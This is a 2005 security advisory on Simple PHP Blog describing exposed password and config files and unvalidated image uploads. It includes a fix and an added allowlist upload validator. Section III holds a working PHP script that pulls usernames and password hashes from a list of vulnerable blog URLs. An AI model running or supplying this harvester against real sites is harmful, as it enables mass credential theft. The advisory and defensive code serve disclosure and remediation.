Simple PHP Blog File Upload and User Credentials Exposure Vulnerabilities
Date: Thu, 25 Aug 2005 22:27:27 -0400
From: Scott Dewey <wr0ck@xorcrew.net.>
To: [email protected], [email protected]
Subject: Simple PHP Blog File Upload and User Credentials Exposure Vulnerabilities


XOR Crew :: Security Advisory 8/25/2005
Simple PHP Blog File Upload and User Credentials Exposure Vulnerabilities
http://www.xorcrew.net/
:: Summary
Vendor       : Alexander Palmo
Vendor Site  : http://www.simplephpblog.com/
Product(s)   : Simple PHP Blog (SPHPBlog)
Version(s)   : All
Severity     : Medium/High
Release Date : 8/25/2005
Impact       : Unauthorized file upload,
             : Exposure of user credentials.
Credits      : ReZEN (rezen (a) xorcrew (.) net),
             : 0xception (oxception (a) xorcrew (.) net).
I. Description

Simple PHP Blog is a PHP (4 or greater) based blogging application that was written with simplicity of installation and maintenance in mind. Unlike other blog software, there is almost no setup - just unzip and copy. It is a dead-simple blog that doesn't require a database. It uses flat text files, and looks nice.
II. Synopsis

The Simple PHP Blog application has two vulnerabilities that, when used together, allow an attacker to upload arbitrary files to the server.

The first vulnerability is caused by insecure default file permissions and the placement of config.txt and password.txt: both files are left fully readable by unauthorized users over the web. This problem was realized earlier in February, unknown to us. The fix for that is simply to deny web access to the config directory of the blog's directory tree with an `.htaccess' file.

The second vulnerability lies within the image upload system provided to (il?)legitimate, logged-in users. The blog performs no validation of the uploaded image, so nothing stops a user from uploading any file they want to the server.

The vendor has been contacted and has failed to reply. This is a problem that has yet to be addressed.
III. Code/PoC

Insecure file upload - fix by ReZEN:

Add to upload_img_cgi.php at line 19:

-----BEGIN-----
// Extensions that must never be stored (ReZEN's denylist).
$no = array( "exe", "pl", "php", "php3", "php4", "php5", "phps", "asp", "cgi", "html", "htm" );

// Walk the whole list (the original loop ran to 10 and skipped "htm").
foreach( $no as $ext ) {
    // strpos() returns false when $ext does not occur in the name. The
    // original test was ">= 0", which is also true for false in PHP, so
    // every upload was refused; "!== false" is the intended check.
    // Note the match is a substring match anywhere in the filename.
    if( strpos( $uploadfile, $ext ) !== false ) {
        echo "That filetype is not allowed";
        exit;
    }
}
------END------

PoC code to harvest usernames and passwords from vulnerable blogs, given a list of URLs:

-----BEGIN-----
<?php
/********************************************
Stupid Script to grab usernames and password
hashes from Simple PHP Blog

Coded by ReZEN of XOR
http://www.xorcrew.net/ReZEN
ReZEN (AT) xorcrew (DOT) net

Greetz: wr0ck, 0xception, tendo, ld, smirks,
ajax, gml(i miss you), Infintiy, my friends
My loving parents =] and anyone else i forgot
*********************************************/

$pdir    = "config/password.txt";  // password hash file left web-readable
$udir    = "config/config.txt";    // '|'-delimited config, username is the second field
$urllist = "urls.txt";             // List of Blog Urls, one per line

// Read the URL list into $url[]; $limit is the number of entries read
// (it was left undefined in the original when the list could not be opened).
$url   = array();
$limit = 0;
$fp = fopen( $urllist, 'rb' );
if( !$fp ) {
    echo "Unable to open: ".$urllist."<br><br>";
} else {
    while( !feof( $fp ) ) {
        $line = trim( fgets( $fp, 1000 ) );
        if( $line != "" ) {
            $url[$limit] = $line;
            $limit = $limit + 1;
        }
    }
    fclose( $fp );
}

for( $i = 0; $i < $limit; $i++ ) {
    $pass = "";
    $conf = "";

    // The original error messages printed $url (the whole array)
    // instead of $url[$i].
    $fp = fopen( $url[$i].$pdir, 'rb' );
    if( !$fp ) {
        echo "Unable to get: ".$url[$i].$pdir."<br><br>";
    } else {
        $pass = fread( $fp, 1000 );
        fclose( $fp );
    }

    $fp = fopen( $url[$i].$udir, 'rb' );
    if( !$fp ) {
        echo "Unable to get: ".$url[$i].$udir."<br><br>";
    } else {
        $conf = fread( $fp, 1000 );
        fclose( $fp );
    }

    $user = explode( "|", $conf );
    echo ( isset( $user[1] ) ? $user[1] : "" ).":".$pass."<br>";
}
?>
------END------
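The denylist above refuses a handful of extensions by substring match, which is fragile in both directions: legitimate names containing "pl" or "htm" are refused, and anything not on the list is accepted. The following is an added example of the allowlist approach a defender would put in the same spot; it is not part of the advisory and not code from Simple PHP Blog. The function names (upload_extension, is_acceptable_image, safe_storage_name) and the sample files are constructed for this example; getimagesize() and the IMAGETYPE_* constants are standard PHP. It accepts a file only when its extension is one of the image types the blog needs, the file content is an image of that same type, and the stored name is chosen by the server rather than taken from the client.

```php
<?php
// Added example (not from the XOR Crew advisory or Simple PHP Blog):
// allowlist-based validation for an image upload.

// The only extensions the blog needs to store; everything else is refused.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'gif', 'png'];

// Which extensions are consistent with which sniffed image type.
const TYPE_EXTENSIONS = [
    IMAGETYPE_JPEG => ['jpg', 'jpeg'],
    IMAGETYPE_GIF  => ['gif'],
    IMAGETYPE_PNG  => ['png'],
];

/**
 * Lower-cased last extension of a client-supplied filename, or null if
 * there is none. Any directory part the client sent is discarded.
 */
function upload_extension(string $filename): ?string
{
    $base = basename($filename);
    $dot  = strrpos($base, '.');
    if ($dot === false || $dot === strlen($base) - 1) {
        return null;
    }
    return strtolower(substr($base, $dot + 1));
}

/**
 * Decide whether an upload may be stored. $tmpPath is the temporary file
 * PHP created for the upload ($_FILES['img']['tmp_name']). Three checks:
 * the extension is allowlisted, the content really is an image (magic
 * bytes via getimagesize), and the sniffed type matches the extension.
 */
function is_acceptable_image(string $filename, string $tmpPath): bool
{
    $ext = upload_extension($filename);
    if ($ext === null || !in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return false;                       // not on the allowlist
    }
    $info = @getimagesize($tmpPath);        // false for non-image content
    if ($info === false || !isset(TYPE_EXTENSIONS[$info[2]])) {
        return false;                       // not an image we handle
    }
    return in_array($ext, TYPE_EXTENSIONS[$info[2]], true);
}

/** Storage name chosen by the server: random, with exactly one extension. */
function safe_storage_name(string $ext): string
{
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs: a 1x1 GIF and a text file, written to temp files.
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='));
$txt = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($txt, "this is plain text, not an image\n");

$cases = [
    ['photo.gif', $gif, true],   // allowlisted and content matches
    ['photo.GIF', $gif, true],   // extension compared case-insensitively
    ['photo.jpg', $gif, false],  // allowlisted, but content is a GIF
    ['photo.php', $gif, false],  // not on the allowlist, whatever the content
    ['photo.gif', $txt, false],  // right extension, content is not an image
    ['photo',     $gif, false],  // no extension at all
];
foreach ($cases as [$name, $path, $want]) {
    $got = is_acceptable_image($name, $path);
    printf("%-10s %-6s (expected %s)\n", $name,
           $got ? 'accept' : 'reject', $want ? 'accept' : 'reject');
}
// A file that passes would then be moved to safe_storage_name($ext),
// e.g. move_uploaded_file($tmpPath, $uploadDir . '/' . safe_storage_name('gif')).
unlink($gif);
unlink($txt);
```

Storing under a server-generated name with a single extension also sidesteps any dependence on how the web server maps multi-extension names to handlers, and the content check means a renamed script is rejected even when its extension looks harmless. Access to the config directory is a separate problem and is handled at the web server, as the synopsis says, not in this function.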
IV. Greets :> All of xor, Infinity, stokhli, ajax, gml, k&k, seeprompt, the rest.